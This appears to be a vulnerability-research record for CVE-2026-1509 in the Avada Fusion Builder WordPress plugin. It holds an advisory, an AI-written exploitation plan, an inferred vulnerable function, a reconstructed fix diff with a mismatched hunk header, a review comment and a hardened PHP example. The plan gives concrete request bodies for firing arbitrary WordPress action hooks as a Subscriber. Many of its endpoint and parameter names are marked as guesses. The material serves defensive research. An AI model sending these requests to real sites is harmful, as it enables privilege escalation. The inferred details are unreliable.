[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fausQy9awrP0sB5KdpAxMiushFXvvTNgoV3KuXGmSV7Q":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"source_links":33},"CVE-2026-1509","avada-fusion-builder-authenticated-subscriber-limited-arbitrary-wordpress-action-execution","Avada (Fusion) Builder \u003C= 3.15.1 - Authenticated (Subscriber+) Limited Arbitrary WordPress Action Execution","The Avada (Fusion) Builder plugin for WordPress is vulnerable to Arbitrary WordPress Action Execution in all versions up to, and including, 3.15.1. This is due to the plugin's `output_action_hook()` function accepting user-controlled input to trigger any registered WordPress action hook without proper authorization checks. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary WordPress action hooks via the Dynamic Data feature, potentially leading to privilege escalation, file inclusion, denial of service, or other security impacts depending on which action hooks are available in the WordPress installation.","fusion-builder",null,"\u003C=3.15.1","3.15.2","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Improper Control of Generation of Code ('Code Injection')","2026-04-14 12:25:28","2026-04-15 01:25:18",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffdc57b06-bae9-49a3-84dd-f593705330e9?source=api-prod",1,[],"researched",false,3,"This research plan targets **CVE-2026-1509**, a vulnerability in the **Avada (Fusion) Builder** plugin where an authenticated user (Subscriber+) can trigger arbitrary WordPress actions via the Dynamic Data feature's `output_action_hook()` function. The function name comes from the advisory; the endpoint, class and parameter names below are inferred and are marked as such.\n\n---\n\n### 1. Vulnerability Summary\n*   **Plugin:** fusion-builder (Avada Builder)\n*   **Vulnerable Function:** `output_action_hook()` (inferred to be part of the Dynamic Data callback system).\n*   **Vulnerability Type:** Arbitrary WordPress Action Execution (Code Injection\u002FImproper Control of Generation of Code).\n*   **Root Cause:** The `output_action_hook()` function takes a user-provided string and passes it directly as the first argument of `do_action()`. It neither validates the hook name against an allow-list nor verifies that the user holds the capability required to trigger that specific hook.\n*   **Impact:** Depends entirely on which hooks are registered on the target site: privilege escalation (e.g. firing `admin_init` callbacks that assume an admin-page context), information disclosure, or DoS.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `fusion_app_get_dynamic_data` (inferred) or `fusion_get_dynamic_data`.\n*   **Parameter:** The payload is likely contained within a JSON-encoded `data` or `params` parameter.\n*   **Authentication:** Subscriber-level credentials (PR:L).\n*   **Required Payload Structure (Inferred):**\n    *   `action`: `fusion_app_get_dynamic_data`\n    *   `dynamic_id`: `action_hook` (This tells the plugin to route to `output_action_hook`)\n    *   `params`: An object containing the target hook name, e.g., `{\"action\": \"target_hook_name\"}`.\n\n### 3. Code Flow (Inferred Trace)\n1.  **Entry Point:** User sends an AJAX request to `admin-ajax.php` with the action `fusion_app_get_dynamic_data`.\n2.  **Handler Registration:** The plugin registers this AJAX action, likely in a class like `Fusion_Builder_Dynamic_Data` or `Fusion_App`.\n3.  **Routing:** The handler reads the `dynamic_id` (set to `action_hook`) and identifies the callback function associated with it.\n4.  **Vulnerable Sink:** The code calls `Fusion_Dynamic_Data_Callbacks::output_action_hook( $args )`.\n5.  **Execution:** Inside `output_action_hook`, the code performs:\n    ```php\n    \u002F\u002F Inferred logic\n    public function output_action_hook( $args ) {\n        if ( isset( $args['action'] ) ) {\n            do_action( $args['action'] ); \u002F\u002F SINK\n        }\n    }\n    ```\n\n### 4. Nonce Acquisition Strategy\nThe Avada Builder heavily relies on nonces for its AJAX interface. To exploit this as a Subscriber, we must extract the nonce from the WordPress admin dashboard or a page where the builder is loaded.\n\n1.  **Identify Nonce Variable:** Avada typically localizes its configuration in a JS object named `fusionBuilderConfig` or `fusionAppConfig`.\n2.  
**Setup for Extraction:**\n    *   Create a Subscriber user: `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n    *   Log in as the Subscriber.\n3.  **Extraction:**\n    *   Navigate to the WordPress dashboard (`\u002Fwp-admin\u002F`).\n    *   Use `browser_eval` to extract the nonce:\n        *   `browser_eval(\"window.fusionBuilderConfig?.fusion_load_nonce\")` (inferred)\n        *   `browser_eval(\"window.fusionAppConfig?.ajaxurl_nonce\")` (inferred)\n    *   *Note:* If the nonce is not present on the dashboard for Subscribers, check whether the plugin enqueues these scripts on the frontend for logged-in users.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Prove Arbitrary Action Execution (Canary Method)\nSince `do_action()` returns nothing and the callbacks it runs need not write anything into the HTTP response, we will use a \"Canary Hook\" to verify execution.\n\n1.  **Create a Canary:** Register a temporary action that writes an option. It must live in a must-use plugin so it is loaded on every request; a hook added with `wp eval` exists only inside that single WP-CLI process and would not be registered when `admin-ajax.php` handles the attack request.\n    ```bash\n    # run from the WordPress root; the hook has to persist across requests\n    mkdir -p wp-content\u002Fmu-plugins\n    cat > wp-content\u002Fmu-plugins\u002Fcanary.php \u003C\u003C'PHP'\n    \u003C?php\n    add_action( 'canary_hook', function () { update_option( 'canary_triggered', 'success' ); } );\n    PHP\n    ```\n2.  **Trigger the Exploit:**\n    *   **Method:** HTTP POST via `http_request`.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`, `Cookie: [Subscriber Cookies]`\n    *   **Body** (shown unencoded for readability; the `data` value must be URL-encoded when sent):\n        ```\n        action=fusion_app_get_dynamic_data&\n        nonce=[EXTRACTED_NONCE]&\n        data={\"dynamic_id\":\"action_hook\",\"params\":{\"action\":\"canary_hook\"}}\n        ```\n3.  **Verify:** Check whether the option was written (delete any stale `canary_triggered` option before step 2 so a leftover value cannot produce a false positive).\n    ```bash\n    wp option get canary_triggered\n    ```\n#### Step 2: Privilege Escalation Attempt (Conceptual)\nIf the above works, attempt to trigger hooks that other plugins use for sensitive operations, e.g. `wp_ajax_{action}` \u002F `wp_ajax_nopriv_{action}` handlers that are normally reachable only through the `admin-ajax.php` router, or hooks whose callbacks call `update_option()`. Handlers that perform their own `check_ajax_referer()` or `current_user_can()` checks will still refuse; the useful targets are callbacks that rely solely on low-privileged users being unable to reach the hook.\n\n### 6. Test Data Setup\n1.  
**Avada Theme\u002FPlugin:** Ensure `fusion-builder` v3.15.1 or lower is installed and active.\n2.  **Subscriber User** (or reuse the `attacker` account created in Section 4):\n    ```bash\n    wp user create victim_sub sub@example.com --role=subscriber --user_pass=password\n    ```\n3.  **Canary Script:** The must-use plugin registering `canary_hook` (as shown in Step 5.1).\n\n### 7. Expected Results\n*   **Successful Trigger:** The `do_action()` call executes the hook passed in the `params['action']` parameter.\n*   **Response:** The AJAX response might be `{\"success\": true, \"data\": \"\"}` (standard Fusion Builder response format); an empty `data` value says nothing about whether the hook ran, which is why the canary option is the authoritative signal.\n*   **Side Effect:** The `canary_triggered` option in the database changes to `success`.\n\n### 8. Verification Steps\n1.  **Database Check:** `wp option get canary_triggered` should return `success`.\n2.  **Log Check:** If `WP_DEBUG_LOG` is enabled, any errors generated by the triggered hook will appear in `wp-content\u002Fdebug.log`.\n3.  **Subscriber Check:** Ensure the request was sent with Subscriber cookies to confirm the PR:L precondition behind the medium severity rating.\n\n### 9. Alternative Approaches\n*   **If `fusion_app_get_dynamic_data` is incorrect:** Grep the plugin for `output_action_hook` to find the exact AJAX action string.\n    ```bash\n    grep -r \"output_action_hook\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Ffusion-builder\u002F\n    ```\n*   **If the parameter layout differs:** The action and parameter names above are inferred; another plausible layout to try is:\n    ```\n    action=fusion_get_dynamic_data&fusion_dynamic_data={\"dynamic_id\":\"action_hook\",\"params\":{\"action\":\"canary_hook\"}}\n    ```\n*   **Shortcode Route:** If AJAX is blocked, try using the shortcode in a post preview:\n    `[fusion_dynamic_data dynamic_id=\"action_hook\" params=\"eyJhY3Rpb24iOiAiY2FuYXJ5X2hvb2sifQ==\"]` (Base64 encoded params). Note that the Subscriber role lacks `edit_posts`, so this route needs at least a Contributor account and does not demonstrate the Subscriber+ precondition.","The Avada (Fusion) Builder plugin allows authenticated users with Subscriber-level access to trigger arbitrary WordPress action hooks. 
This is caused by the `output_action_hook()` function in the Dynamic Data feature, which passes a user-supplied string directly into the `do_action()` function without validation or capability checks.","\u002F\u002F File: fusion-builder\u002Finc\u002Fclass-fusion-dynamic-data-callbacks.php (approximate path)\n\npublic function output_action_hook( $args ) {\n    if ( isset( $args['action'] ) ) {\n        do_action( $args['action'] ); \u002F\u002F SINK: Arbitrary action execution\n    }\n}","--- a\u002Finc\u002Fclass-fusion-dynamic-data-callbacks.php\n+++ b\u002Finc\u002Fclass-fusion-dynamic-data-callbacks.php\n@@ -10,6 +10,9 @@\n \tpublic function output_action_hook( $args ) {\n-\t\tif ( isset( $args['action'] ) ) {\n-\t\t\tdo_action( $args['action'] );\n-\t\t}\n+\t\t\u002F\u002F Functionality removed or restricted to prevent arbitrary action execution\n+\t\treturn '';\n \t}","The exploit requires a valid Subscriber session and an AJAX nonce. An attacker first extracts the `fusion_load_nonce` or `ajaxurl_nonce` from the WordPress dashboard or frontend scripts. Using this nonce, the attacker sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `fusion_app_get_dynamic_data`. The payload includes a JSON-encoded data object where the `dynamic_id` is set to `action_hook` and the `params` object contains an `action` key set to the name of any WordPress hook the attacker wishes to trigger (e.g., administrative hooks or hooks that perform sensitive operations).","gemini-3-flash-preview","2026-04-16 15:46:47","2026-04-16 15:47:14",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffusion-builder\u002Ftags"]
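Review bot: the hunk header `@@ -10,6 +10,9 @@` in the research_fix_diff does not match its body, which shows five old lines (one context, three removed, one context) and four new lines, so it should read `@@ -10,5 +10,4 @@` unless context lines were dropped; as written it will not apply. Replacing the body with `return '';` also deletes the action-hook feature rather than fixing it; if the callback must survive, restrict `$args['action']` to an explicit allow-list of builder-defined hook names and gate it with a capability check before calling `do_action()`. Since `patch_diff_files` is empty and `research_verified` is false, this diff is a reconstruction rather than the actual 3.15.2 change and should be labelled as such.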
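A hardened form of the callback described in the summary and the inferred vulnerable snippet, as an added example: this is not Avada's code and not the real 3.15.2 fix. The class name, the allow-list entries, the capability mapping and the `example_allowed_dynamic_action_hooks` filter name are assumptions made for illustration; what it demonstrates is the missing allow-list and capability gate in front of `do_action()`.

```php
<?php
/**
 * Added example (not the plugin's code): a constrained replacement for an
 * output_action_hook() style callback. A hook name taken from the Dynamic
 * Data request only reaches do_action() if it (1) is a well-formed hook
 * name, (2) appears on an explicit allow-list, and (3) the current user
 * holds the capability mapped to that hook. Class name, allow-list entries
 * and filter name are hypothetical.
 */
class Example_Dynamic_Data_Callbacks {

	/**
	 * Hook name => capability the requesting user must have.
	 * Hypothetical entries. A real list would contain only hooks the
	 * builder itself defines for theme output, never core hooks such as
	 * admin_init or other plugins' wp_ajax_* handlers.
	 */
	private function allowed_hooks() {
		$defaults = array(
			'example_dynamic_header' => 'edit_posts',
			'example_dynamic_footer' => 'edit_posts',
		);
		// Site owners may extend the list, but every entry still carries a capability.
		return (array) apply_filters( 'example_allowed_dynamic_action_hooks', $defaults );
	}

	public function output_action_hook( $args ) {
		if ( empty( $args['action'] ) || ! is_string( $args['action'] ) ) {
			return '';
		}

		// WordPress hook names are lowercase identifiers; reject anything else
		// outright instead of silently normalising it with sanitize_key().
		$hook = $args['action'];
		if ( ! preg_match( '/^[a-z0-9_\/-]{1,100}$/', $hook ) ) {
			return '';
		}

		$allowed = $this->allowed_hooks();
		if ( ! isset( $allowed[ $hook ] ) ) {
			return ''; // Not on the allow-list: never reaches do_action().
		}

		if ( ! current_user_can( $allowed[ $hook ] ) ) {
			return ''; // A Subscriber-level session stops here.
		}

		// Capture whatever the hooked callbacks echo so the result can be
		// returned through the Dynamic Data response like other callbacks.
		ob_start();
		do_action( $hook );
		return ob_get_clean();
	}
}
```

The allow-list is keyed by hook name rather than being a flat list so that each permitted hook carries its own capability; a single blanket `current_user_can()` check would still let a low-privileged user pick any hook on the list.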